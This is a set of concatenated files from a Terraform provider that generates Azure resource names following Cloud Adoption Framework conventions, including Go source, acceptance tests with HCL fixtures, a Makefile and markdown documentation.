    "rg": {"resource group", "rg", 1, 80, false, unicode, `^[-\w\._\(\)]{1,80}$`, true, "resourceGroup"},
    "snet": {"virtual network subnet", "snet", 1, 80, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,78}[0-9a-zA-Z_]$", true, "resourceGroup"},
    "sql": {"azure sql db server", "sql", 1, 63, true, alphanumh, "^[0-9a-z][0-9a-z-]{0,61}[0-9a-z]$", true, "resourceGroup"},
    "sqldb": {"azure sql db", "sqldb", 1, 128, false, invsqldb, "^[^<>*%&:\\/?. ][^<>*%&:\\/?]{0,126}[^<>*%&:\\/?. ]$", true, "resourceGroup"},
    "st": {"storage account", "st", 3, 24, true, alphanum, "^[0-9a-z]{3,24}$", true, "resourceGroup"},
    "vml": {"virtual machine (linux)", "vml", 1, 64, false, alphanumh, "^[0-9a-zA-Z][0-9A-Za-z_-]{0,62}[0-9a-zA-Z_]$", true, "resourceGroup"},
    "vmw": {"virtual machine (windows)", "vmw", 1, 15, false, alphanumh, "^[0-9a-zA-Z][0-9A-Za-z_-]{0,13}[0-9a-zA-Z_]$", true, "resourceGroup"},
    "vnet": {"virtual network", "vnet", 2, 64, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,62}[0-9a-zA-Z_]$", true, "resourceGroup"},
}
// ResourcesMapping enforcing new naming convention.
// Maps the long (azurerm_*) resource type codes to the short-code
// definitions in Resources.
var ResourcesMapping = map[string]ResourceStructure{
    "azurerm_automation_account": Resources["aaa"],
    "azurerm_container_app": Resources["ac"],
    "azurerm_container_app_environment": Resources["ace"],
    "azurerm_container_registry": Resources["acr"],
    "azurerm_firewall": Resources["afw"],
    "azurerm_application_gateway": Resources["agw"],
    "azurerm_api_management": Resources["apim"],
    "azurerm_app_service": Resources["app"],
    "azurerm_application_insights": Resources["appi"],
    "azurerm_app_service_environment": Resources["ase"],
    "azurerm_recovery_services_vault": Resources["asr"],
    "azurerm_eventhub_namespace": Resources["evh"],
    "generic": Resources["gen"],
    "azurerm_key_vault": Resources["kv"],
    "azurerm_kubernetes_cluster": Resources["aks"],
    "aks_dns_prefix": Resources["aksdns"],
    "aks_node_pool_linux": Resources["aksnpl"],
    "aks_node_pool_windows": Resources["aksnpw"],
    "azurerm_log_analytics_workspace": Resources["la"],
    "azurerm_network_interface": Resources["nic"],
    "azurerm_network_security_group": Resources["nsg"],
    "azurerm_public_ip": Resources["pip"],
    "azurerm_app_service_plan": Resources["plan"],
    "azurerm_resource_group": Resources["rg"],
    "azurerm_subnet": Resources["snet"],
    "azurerm_sql_server": Resources["sql"],
    "azurerm_sql_database": Resources["sqldb"],
    "azurerm_storage_account": Resources["st"],
    // NOTE(review): the docs list these long codes as
    // azurerm_virtual_machine_linux / azurerm_virtual_machine_windows; the
    // "windows_" prefix below looks like a copy-paste slip — confirm before
    // renaming, since existing callers may rely on the current keys.
    "azurerm_windows_virtual_machine_linux": Resources["vml"],
    "azurerm_windows_virtual_machine_windows": Resources["vmw"],
    "azurerm_virtual_network": Resources["vnet"],
}
<file_sep>/azurecaf/resource_naming_convention_cafrandom_test.go
package azurecaf
import (
"regexp"
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
)
func TestAccCafNamingConventionCaf_Random(t *testing.T) {
resource.UnitTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
Providers: testAccProviders,
CheckDestroy: testAccCheckResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccResourceCafRandomConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_naming_convention.st",
"log",
Resources["st"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.st", regexp.MustCompile(Resources["st"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.aaa",
"automation",
Resources["aaa"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.aaa", regexp.MustCompile(Resources["aaa"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.acr",
"registry",
Resources["acr"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.acr", regexp.MustCompile(Resources["acr"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.acr_max",
"acrlevel0",
45,
"rdmi"),
regexMatch("azurecaf_naming_convention.acr_max", regexp.MustCompile(Resources["acr"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.rg",
"myrg",
Resources["rg"].MaxLength,
"(_124)"),
regexMatch("azurecaf_naming_convention.rg", regexp.MustCompile(Resources["rg"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.afw",
"fire",
Resources["afw"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.afw", regexp.MustCompile(Resources["afw"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.asr",
"recov",
Resources["asr"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.asr", regexp.MustCompile(Resources["asr"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.evh",
"hub",
Resources["evh"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.evh", regexp.MustCompile(Resources["evh"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.kv",
"passepartout",
Resources["kv"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.kv", regexp.MustCompile(Resources["kv"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.aks",
"kubedemo",
Resources["aks"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.aks", regexp.MustCompile(Resources["aks"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.aksdns",
"kubedemodns",
Resources["aksdns"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.aksdns", regexp.MustCompile(Resources["aksdns"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.la",
"logs",
Resources["la"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.la", regexp.MustCompile(Resources["la"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.nic",
"mynetcard",
Resources["nic"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.nic", regexp.MustCompile(Resources["nic"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.nsg",
"sec",
Resources["nsg"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.nsg", regexp.MustCompile(Resources["nsg"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.pip",
"mypip",
Resources["pip"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.pip", regexp.MustCompile(Resources["pip"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.snet",
"snet",
Resources["snet"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.snet", regexp.MustCompile(Resources["snet"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.vnet",
"vnet",
Resources["vnet"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.vnet", regexp.MustCompile(Resources["vnet"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.vmw",
"winVMT",
Resources["vmw"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.vmw", regexp.MustCompile(Resources["vmw"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.vml",
"linuxVM",
Resources["vml"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.vml", regexp.MustCompile(Resources["vml"].ValidationRegExp), 1),
),
},
},
})
}
// testAccResourceCafRandomConfig declares one azurecaf_naming_convention
// resource per resource type exercised by TestAccCafNamingConventionCaf_Random.
// The HCL below is runtime data: the test assertions pin the names produced
// from it, so keep it byte-for-byte stable.
const testAccResourceCafRandomConfig = `
#Storage account test
resource "azurecaf_naming_convention" "st" {
convention = "cafrandom"
name = "log"
prefix = "rdmi"
resource_type = "st"
}
# Azure Automation Account
resource "azurecaf_naming_convention" "aaa" {
convention = "cafrandom"
name = "automation"
prefix = "rdmi"
resource_type = "aaa"
}
# Azure Container registry
resource "azurecaf_naming_convention" "acr" {
convention = "cafrandom"
name = "registry"
prefix = "rdmi"
resource_type = "acr"
}
resource "azurecaf_naming_convention" "acr_max" {
convention = "cafrandom"
name = "acrlevel0"
prefix = "rdmi"
max_length = 45
resource_type = "acr"
}
# Resource Group
resource "azurecaf_naming_convention" "rg" {
convention = "cafrandom"
name = "myrg"
prefix = "(_124)"
resource_type = "rg"
}
# Azure Firewall
resource "azurecaf_naming_convention" "afw" {
convention = "cafrandom"
name = "fire"
prefix = "rdmi"
resource_type = "afw"
}
# Azure Recovery Vault
resource "azurecaf_naming_convention" "asr" {
convention = "cafrandom"
name = "recov"
prefix = "rdmi"
resource_type = "asr"
}
# Event Hub
resource "azurecaf_naming_convention" "evh" {
convention = "cafrandom"
name = "hub"
prefix = "rdmi"
resource_type = "evh"
}
# Key Vault
resource "azurecaf_naming_convention" "kv" {
convention = "cafrandom"
name = "passepartout"
prefix = "rdmi"
resource_type = "kv"
}
# Azure Kubernetes Service
resource "azurecaf_naming_convention" "aks" {
convention = "cafrandom"
name = "kubedemo"
prefix = "rdmi"
resource_type = "aks"
}
# Azure Kubernetes Service
resource "azurecaf_naming_convention" "aksdns" {
convention = "cafrandom"
name = "kubedemodns"
prefix = "rdmi"
resource_type = "aksdns"
}
# Log Analytics Workspace
resource "azurecaf_naming_convention" "la" {
convention = "cafrandom"
name = "logs"
prefix = "rdmi"
resource_type = "la"
}
# Network Interface
resource "azurecaf_naming_convention" "nic" {
convention = "cafrandom"
name = "mynetcard"
prefix = "rdmi"
resource_type = "nic"
}
# Network Security Group
resource "azurecaf_naming_convention" "nsg" {
convention = "cafrandom"
name = "sec"
prefix = "rdmi"
resource_type = "nsg"
}
# Public Ip
resource "azurecaf_naming_convention" "pip" {
convention = "cafrandom"
name = "mypip"
prefix = "rdmi"
resource_type = "pip"
}
# subnet
resource "azurecaf_naming_convention" "snet" {
convention = "cafrandom"
name = "snet"
prefix = "rdmi"
resource_type = "snet"
}
# Virtual Network
resource "azurecaf_naming_convention" "vnet" {
convention = "cafrandom"
name = "vnet"
prefix = "rdmi"
resource_type = "vnet"
}
# VM Windows
resource "azurecaf_naming_convention" "vmw" {
convention = "cafrandom"
name = "winVMToolongShouldbetrimmed"
prefix = "rdmi"
resource_type = "vmw"
}
# VM Linux
resource "azurecaf_naming_convention" "vml" {
convention = "cafrandom"
name = "linuxVM"
prefix = "rdmi"
resource_type = "vml"
}
`
<file_sep>/docs/resources/azurecaf_naming_convention.md
# azurecaf_naming_convention
The resource naming_convention implements a set of methodologies to apply consistent resource naming using the default Microsoft Cloud Adoption Framework for Azure recommendations as per https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging.
The naming_convention resource is the initial resource released as part of the azurecaf provider; it supports a fixed set of resources as described in the documentation. In order to provide more flexibility and support the large breadth of Azure resources available, you can use the azurecaf_name resource.
## Example usage
This example outputs one name, the result of the naming convention query. The result attribute returns the name based on the convention and parameters input.
The example generates a 23 characters name compatible with the specification for an Azure Resource Group
dev-aztfmod-001
```hcl
resource "azurecaf_naming_convention" "cafrandom_rg" {
name = "aztfmod"
prefix = "dev"
resource_type = "rg"
postfix = "001"
max_length = 23
convention = "cafrandom"
}
resource "azurerm_resource_group" "cafrandom" {
name = azurecaf_naming_convention.cafrandom_rg.result
location = "southeastasia"
}
```

The provider generates a name using the input parameters and automatically appends a prefix (if defined), a caf prefix (resource type) and postfix (if defined) in addition to a generated padding string based on the selected naming convention.
The example above would generate a name using the pattern [prefix]-[cafprefix]-[name]-[postfix]-[padding]:
```
dev-aztfmod-rg-001-wxyz
```
## Argument Reference
The following arguments are supported:
* name - (optional) the basename of the resource to create, the basename will be sanitized as per supported character set in Azure.
* convention (optional) - one of the four naming conventions supported. Defaults to cafrandom. Allowed values are cafclassic, cafrandom, random, passthrough
* prefix (optional) - prefix to append as the first characters of the generated name
* postfix (optional) - additional postfix added after the basename; this can be used to append a resource index (eg. vm-001)
* max_length (optional) - configure the maximum length of the returned object name; if the specified length is longer than the supported length of the Azure resource, the latter applies
* resource_type (optional) - describes the type of azure resource you are requesting a name from (eg. azure container registry: acr). See the Resource Type section
## Attributes Reference
The following attributes are exported:
* id - The id of the naming convention object
* result - The generated name for an Azure Resource based on the input parameters and the selected naming convention
## Methods for naming convention
The following methods are implemented for naming conventions:
| method name | description of the naming convention used |
| -- | -- |
| cafclassic | follows Cloud Adoption Framework for Azure recommendations as per https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging |
| cafrandom | follows Cloud Adoption Framework for Azure recommendations as per https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging and adds randomly generated characters up to maximum length of name |
| random | name will be generated automatically in full lengths of azure object |
| passthrough | naming convention is implemented manually, fields given as input will be same as the output (but lengths and forbidden chars will be filtered out) |
## Resource types
We define resource types as per: https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging
Current prototype supports:
| Resource type | Resource type code (short) | Resource type code (long) |
| ----------------------------------- | ----------------------------|-----------------------------------------|
| Azure Automation | aaa | azurerm_automation_account |
| Azure Container App | ac | azurerm_container_app |
| Azure Container App Environment | ace | azurerm_container_app_environment |
| Azure Container Registry | acr | azurerm_container_registry |
| Azure Firewall | afw | azurerm_firewall |
| Application Gateway | agw | azurerm_application_gateway |
| API Management | apim | azurerm_api_management |
| App Service | app | azurerm_app_service |
| Application Insights | appi | azurerm_application_insights |
| App Service Environment | ase | azurerm_app_service_environment |
| Azure Kubernetes Service | aks | azurerm_kubernetes_cluster |
| Azure Kubernetes Service DNS prefix | aksdns | aks_dns_prefix |
| AKS Node Pool Linux | aksnpl | aks_node_pool_linux |
| AKS Node Pool Windows | aksnpw | aks_node_pool_windows |
| Azure Site Recovery | asr | azurerm_recovery_services_vault |
| Azure Event Hubs | evh | azurerm_eventhub_namespace |
| generic | gen | generic |
| Azure Key Vault | kv | azurerm_key_vault |
| Azure Monitor Log Analytics | la | azurerm_log_analytics_workspace |
| Virtual Network Interface Card | nic | azurerm_network_interface |
| Network Security Group | nsg | azurerm_network_security_group |
| Public IP | pip | azurerm_public_ip |
| App Service Plan | plan | azurerm_app_service_plan |
| Resource group | rg | azurerm_resource_group |
| Subnet | snet | azurerm_subnet |
| Azure SQL DB Server | sql | azurerm_sql_server |
| Azure SQL DB | sqldb | azurerm_sql_database |
| Azure Storage Account | st | azurerm_storage_account |
| Linux Virtual Machine | vml | azurerm_virtual_machine_linux |
| Windows Virtual Machine | vmw | azurerm_virtual_machine_windows |
| Virtual Network | vnet | azurerm_virtual_network |
<file_sep>/azurecaf/resource_naming_convention_test.go
package azurecaf
import (
"fmt"
"regexp"
"strings"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
"github.com/hashicorp/terraform-plugin-sdk/v2/terraform"
)
// testAccCafNamingValidation returns a check validating the "result"
// attribute of the resource at id: it must have exactly expectedLength
// characters, start with prefix, and contain the basename.
func testAccCafNamingValidation(id string, name string, expectedLength int, prefix string) resource.TestCheckFunc {
    return func(state *terraform.State) error {
        res, found := state.RootModule().Resources[id]
        if !found {
            return fmt.Errorf("Not found: %s", id)
        }
        if res.Primary.ID == "" {
            return fmt.Errorf("No ID is set")
        }
        generated := res.Primary.Attributes["result"]
        switch {
        case len(generated) != expectedLength:
            return fmt.Errorf("got %s %d result items; want %d", generated, len(generated), expectedLength)
        case !strings.HasPrefix(generated, prefix):
            return fmt.Errorf("got %s which doesn't start with %s", generated, prefix)
        case !strings.Contains(generated, name):
            return fmt.Errorf("got %s which doesn't contain the name %s", generated, name)
        }
        return nil
    }
}
// regexMatch builds a TestCheckFunc asserting that the "result" attribute of
// resource id matches exp exactly requiredMatches times.
func regexMatch(id string, exp *regexp.Regexp, requiredMatches int) resource.TestCheckFunc {
	return func(s *terraform.State) error {
		res, found := s.RootModule().Resources[id]
		if !found {
			return fmt.Errorf("Not found: %s", id)
		}
		if res.Primary.ID == "" {
			return fmt.Errorf("No ID is set")
		}
		result := res.Primary.Attributes["result"]
		matches := exp.FindAllStringSubmatchIndex(result, -1)
		if len(matches) != requiredMatches {
			return fmt.Errorf("result string is %s; did not match %s, got %d", result, exp, len(matches))
		}
		return nil
	}
}
<file_sep>/azurecaf/data_name.go
package azurecaf
import (
"context"
"github.com/hashicorp/terraform-plugin-sdk/v2/diag"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/validation"
)
// dataName returns the schema of the azurecaf_name data source, which
// computes a CAF-compliant resource name from a base name, optional
// prefixes/suffixes and an optional random suffix, exposed via "result".
func dataName() *schema.Resource {
	// The keys of ResourceDefinitions are the supported resource types;
	// they drive the validation of the resource_type argument below.
	resourceMapsKeys := make([]string, 0, len(ResourceDefinitions))
	for k := range ResourceDefinitions {
		resourceMapsKeys = append(resourceMapsKeys, k)
	}
	return &schema.Resource{
		ReadContext: dataNameRead,
		Schema: map[string]*schema.Schema{
			// Base name; empty by default so a name made purely of
			// prefixes/suffixes/random characters is possible.
			"name": {
				Type:     schema.TypeString,
				Optional: true,
				ForceNew: true,
				Default:  "",
			},
			// Components prepended to the name; empty strings rejected.
			"prefixes": {
				Type: schema.TypeList,
				Elem: &schema.Schema{
					Type:         schema.TypeString,
					ValidateFunc: validation.NoZeroValues,
				},
				Optional: true,
				ForceNew: true,
			},
			// Components appended to the name; empty strings rejected.
			"suffixes": {
				Type: schema.TypeList,
				Elem: &schema.Schema{
					Type:         schema.TypeString,
					ValidateFunc: validation.NoZeroValues,
				},
				Optional: true,
				ForceNew: true,
			},
			// Number of random characters to generate (0 disables them).
			"random_length": {
				Type:         schema.TypeInt,
				Optional:     true,
				ForceNew:     true,
				ValidateFunc: validation.IntAtLeast(0),
				Default:      0,
			},
			// Computed output: the generated resource name.
			"result": {
				Type:     schema.TypeString,
				Computed: true,
			},
			// Separator placed between name components.
			"separator": {
				Type:     schema.TypeString,
				Optional: true,
				ForceNew: true,
				Default:  "-",
			},
			// Input-cleaning toggle, forwarded to getResourceName
			// (NOTE(review): presumably strips invalid characters — confirm there).
			"clean_input": {
				Type:     schema.TypeBool,
				Optional: true,
				ForceNew: true,
				Default:  true,
			},
			// Passthrough toggle, forwarded to getResourceName
			// (NOTE(review): presumably returns the input name as-is — confirm there).
			"passthrough": {
				Type:     schema.TypeBool,
				Optional: true,
				ForceNew: true,
				Default:  false,
			},
			// Resource type whose naming rules apply; restricted to the
			// keys of ResourceDefinitions.
			"resource_type": {
				Type:         schema.TypeString,
				Optional:     true,
				ValidateFunc: validation.StringInSlice(resourceMapsKeys, false),
				ForceNew:     true,
			},
			// Seed for the random suffix; the same seed yields the same
			// suffix (see randSeq usage in getNameReadResult).
			"random_seed": {
				Type:     schema.TypeInt,
				Optional: true,
				ForceNew: true,
			},
			// Slug toggle, forwarded to getResourceName
			// (NOTE(review): presumably embeds the CAF abbreviation — confirm there).
			"use_slug": {
				Type:     schema.TypeBool,
				Optional: true,
				ForceNew: true,
				Default:  true,
			},
		},
	}
}
// dataNameRead implements ReadContext for the azurecaf_name data source.
// Fix: the error returned by getNameReadResult was previously discarded,
// hiding naming failures from the user; it is now surfaced as a diagnostic.
func dataNameRead(ctx context.Context, d *schema.ResourceData, meta interface{}) diag.Diagnostics {
	if err := getNameReadResult(d, meta); err != nil {
		return diag.FromErr(err)
	}
	return diag.Diagnostics{}
}
// getNameReadResult computes the CAF-compliant name from the data source
// arguments and stores it in both the "result" attribute and the resource ID.
func getNameReadResult(d *schema.ResourceData, meta interface{}) error {
	baseName := d.Get("name").(string)
	prefixList := convertInterfaceToString(d.Get("prefixes").([]interface{}))
	suffixList := convertInterfaceToString(d.Get("suffixes").([]interface{}))
	sep := d.Get("separator").(string)
	resType := d.Get("resource_type").(string)
	clean := d.Get("clean_input").(bool)
	passthrough := d.Get("passthrough").(bool)
	slug := d.Get("use_slug").(bool)
	randLen := d.Get("random_length").(int)
	seed := int64(d.Get("random_seed").(int))

	// The random characters are generated up front so that an identical
	// seed always produces an identical suffix.
	randomSuffix := randSeq(randLen, &seed)
	precedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
	result, err := getResourceName(resType, sep, prefixList, baseName, suffixList, randomSuffix, ConventionCafClassic, clean, passthrough, slug, precedence)
	if err != nil {
		return err
	}
	d.Set("result", result)
	d.SetId(result)
	return nil
}
<file_sep>/azurecaf/provider_test.go
package azurecaf
import (
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"github.com/hashicorp/terraform-plugin-sdk/v2/terraform"
)
// Shared acceptance-test fixtures: a single provider instance, registered
// in the map consumed by the terraform-plugin-sdk test framework.
var testAccProviders map[string]*schema.Provider
var testAccProvider *schema.Provider

// init wires the azurecaf provider into the acceptance-test provider map.
func init() {
	testAccProvider = Provider()
	testAccProviders = map[string]*schema.Provider{
		"azurecaf": testAccProvider,
	}
}
// TestProvider checks that the provider schema passes the SDK's internal
// validation.
func TestProvider(t *testing.T) {
	err := Provider().InternalValidate()
	if err != nil {
		t.Fatalf("err: %s", err)
	}
}
// TestProvider_impl is a compile-time assertion that Provider returns a
// *schema.Provider.
func TestProvider_impl(t *testing.T) {
	var p *schema.Provider = Provider()
	_ = p
}
// testAccPreCheck runs before each acceptance test. This provider needs no
// environment prerequisites (credentials, endpoints), so it is a no-op.
func testAccPreCheck(t *testing.T) {
}
// Resources are local-only: the test suite creates no infrastructure, so
// there is nothing to destroy and the check always succeeds.
func testAccCheckResourceDestroy(s *terraform.State) error {
	return nil
}
<file_sep>/azurecaf/data_environment_variable.go
package azurecaf
import (
"context"
"github.com/hashicorp/terraform-plugin-sdk/v2/diag"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"os"
)
// dataEnvironmentVariable returns the schema of the
// azurecaf_environment_variable data source, which reads an environment
// variable on the machine running Terraform and exposes its value.
func dataEnvironmentVariable() *schema.Resource {
	return &schema.Resource{
		ReadContext: resourceAction,
		Schema: map[string]*schema.Schema{
			// Name of the environment variable to read.
			"name": {
				Type:        schema.TypeString,
				Required:    true,
				Description: "Name of the environment variable.",
			},
			// Opt-in failure when the variable is missing.
			"fails_if_empty": {
				Type:        schema.TypeBool,
				Optional:    true,
				Default:     false,
				Description: "Throws an error if the environment variable is not set (default: false).",
			},
			// Computed output; marked Sensitive so the value is redacted
			// from CLI output and logs.
			"value": {
				Type:        schema.TypeString,
				Computed:    true,
				Description: "Value of the environment variable.",
				Sensitive:   true,
			},
		},
	}
}
// resourceAction reads the environment variable named by "name" and stores
// its value in the computed "value" attribute.
// Fix: the fails_if_empty flag (documented as defaulting to false) was never
// consulted — any unset variable raised an error unconditionally. An error
// is now returned only when the value is missing/empty AND fails_if_empty
// is true; otherwise an empty value is stored.
func resourceAction(ctx context.Context, d *schema.ResourceData, meta interface{}) diag.Diagnostics {
	var diags diag.Diagnostics
	name := d.Get("name").(string)
	failsIfEmpty := d.Get("fails_if_empty").(bool)
	// os.LookupEnv yields "" for unset variables, so an unset and an
	// empty variable are treated the same here.
	value := os.Getenv(name)
	if value == "" && failsIfEmpty {
		return diag.Errorf("Value is not set for environment variable: %s", name)
	}
	d.SetId(name)
	_ = d.Set("value", value)
	return diags
}
<file_sep>/main.go
package main
import (
"github.com/aztfmod/terraform-provider-azurecaf/azurecaf"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"github.com/hashicorp/terraform-plugin-sdk/v2/plugin"
)
//go:generate go run gen.go
// main starts the plugin server that exposes the azurecaf provider to
// Terraform over the go-plugin protocol.
func main() {
	opts := &plugin.ServeOpts{
		ProviderFunc: func() *schema.Provider {
			return azurecaf.Provider()
		},
	}
	plugin.Serve(opts)
}
<file_sep>/completness/existing.go
package main
import (
"bufio"
"encoding/json"
"fmt"
"io/ioutil"
"log"
"os"
"path"
"sort"
)
// The idea of this package is to check the provider for completeness.
// To update the list of existing resources I queried
// https://registry.terraform.io/v2/provider-versions/7185?include=provider-docs
// then used the jq expression `"azurerm_\(.included[].attributes.title)"`
// followed by manual cleaning of the non-resource doc links
// ResourceStructure resource definition structure
// Copied from gen.go
type ResourceStructure struct {
	// Resource type name
	ResourceTypeName string `json:"name"`
	// Resource prefix as defined in the Azure Cloud Adoption Framework
	CafPrefix string `json:"slug,omitempty"`
	// MinLength attribute defines the minimum length of the name
	MinLength int `json:"min_length"`
	// MaxLength attribute defines the maximum length of the name
	MaxLength int `json:"max_length"`
	// enforce lowercase
	LowerCase bool `json:"lowercase,omitempty"`
	// Regular expression to apply to the resource type
	RegEx string `json:"regex,omitempty"`
	// the Regular expression to validate the generated string
	ValidationRegExp string `json:"validation_regex,omitempty"`
	// can the resource include dashes
	Dashes bool `json:"dashes"`
	// The scope of this name where it needs to be unique
	Scope string `json:"scope,omitempty"`
}
// main prints a markdown table reporting, for every known azurerm resource
// type, whether it is implemented in resourceDefinition.json.
// Fix: the error returned by os.Getwd was previously overwritten unchecked
// by the next assignment; it is now handled before being clobbered.
func main() {
	wd, err := os.Getwd()
	if err != nil {
		log.Fatal(err)
	}
	sourceDefinitions, err := ioutil.ReadFile(path.Join(wd, "../resourceDefinition.json"))
	if err != nil {
		log.Fatal(err)
	}
	s, err := readLines(path.Join(wd, "/existing_tf_resources.txt"))
	if err != nil {
		log.Fatal(err)
	}
	// Sorting groups duplicates together so the de-duplication below works.
	sort.Strings(s)
	var data []ResourceStructure
	err = json.Unmarshal(sourceDefinitions, &data)
	if err != nil {
		log.Fatal(err)
	}
	implemented := make(map[string]bool)
	for _, name := range s {
		_, found := findByName(data, name)
		implemented[name] = found
	}
	fmt.Println("|resource | status |")
	fmt.Println("|---|---|")
	current := ""
	for _, name := range s {
		// Skip consecutive duplicates (list is sorted above).
		if name == current {
			continue
		}
		current = name
		status := "❌"
		if implemented[name] {
			status = "✔"
		}
		fmt.Printf("|%s | %s |\n", name, status)
	}
}
// findByName reports the index of the first resource definition whose
// ResourceTypeName equals name, or (-1, false) when no match exists.
func findByName(slice []ResourceStructure, name string) (int, bool) {
	for idx := range slice {
		if slice[idx].ResourceTypeName == name {
			return idx, true
		}
	}
	return -1, false
}
func readLines(path string) ([]string, error) {
file, err := os.Open(path)
if err != nil {
return nil, err
}
defer file.Close()
var lines []string
scanner := bufio.NewScanner(file)
for scanner.Scan() {
lines = append(lines, scanner.Text())
}
return lines, scanner.Err()
}
<file_sep>/Makefile
default: help

# Add help text after each target name starting with '\#\#'
# Found here: https://gist.github.com/prwhite/8168133
.PHONY: help
help: ## Display help
	@awk 'BEGIN {FS = ":.*##"; printf "\nUsage:\n make \033[36m\033[0m\n"} /^[a-zA-Z_-]+:.*?##/ { printf " \033[36m%-15s\033[0m %s\n", $$1, $$2 } /^##@/ { printf "\n\033[1m%s\033[0m\n", substr($$0, 5) } ' $(MAKEFILE_LIST)

# All remaining targets are commands, not files: declare them phony so make
# always runs them, even if a file or directory with the same name exists.
.PHONY: dev_container build unittest test generate_resource_table

dev_container:
	go generate
	go fmt
	go build -o ~/.terraform.d/plugins/linux_amd64/terraform-provider-azurecaf

build: ## Build the project
	go generate
	go fmt ./...
	go build -o ./terraform-provider-azurecaf
	go test ./...

unittest: ## Init go test
	go test ./...
	tfproviderlint ./...

test: # Start a terraform test / invisible help comment
	cd ./examples && terraform init && terraform plan && terraform apply -auto-approve

generate_resource_table: ## Generate resource table (output only)
	cat resourceDefinition.json | jq -r '.[] | "| \(.name)| \(.slug)| \(.min_length)| \(.max_length)| \(.lowercase)| \(.validation_regex)|"'
	cat resourceDefinition_out_of_docs.json | jq -r '.[] | "| \(.name)| \(.slug)| \(.min_length)| \(.max_length)| \(.lowercase)| \(.validation_regex)|"'
<file_sep>/docs/index.md
# Azurecaf provider
The Azurecaf provider is a *logical provider*, which means that it works entirely within Terraform's logic and doesn't interact with any other services. The goal of this provider is to provide helper methods for implementing Azure landing zones using Terraform.
The Azurecaf provider currently contains two resources based on the Terraform random_string provider. The naming_convention resource is the first iteration of our naming-convention implementation, enforcing the Azure Cloud Adoption Framework naming convention.
Given the growing number of Azure resources, a new implementation is now available through the azurecaf_name resource, introduced to avoid breaking changes. The new implementation supports an extensive list of resource types and will be updated on a regular basis as new services are released.
## Resource types
We define resource types as per: https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging
Current supported resource types:
| Resource type | Resource type code (short) | minimum length | maximum length | lowercase only | validation regex |
| ------------------------| ----------------------------|-----------------|-----------------|----------------|-------------------------------------------|
| azurerm_analysis_services_server| as| 3| 63| true| "^[a-z][a-z0-9]{2,62}$" |
| azurerm_api_management_service| apim| 1| 50| false| "^[a-z][a-zA-Z0-9-][a-zA-Z0-9]{0,48}$"|
| azurerm_app_configuration| appcg| 5| 50| false| "^[a-zA-Z0-9_-]{5,50}$"|
| azurerm_role_assignment| ra| 1| 64| false| "^[^%]{0,63}[^ %.]$"|
| azurerm_role_definition| rd| 1| 64| false| "^[^%]{0,63}[^ %.]$"|
| azurerm_automation_account| aa| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_automation_certificate| aacert| 1| 128| false| "^[^<>*%:.?\\+\\/]{0,127}[^<>*%:.?\\+\\/ ]$"|
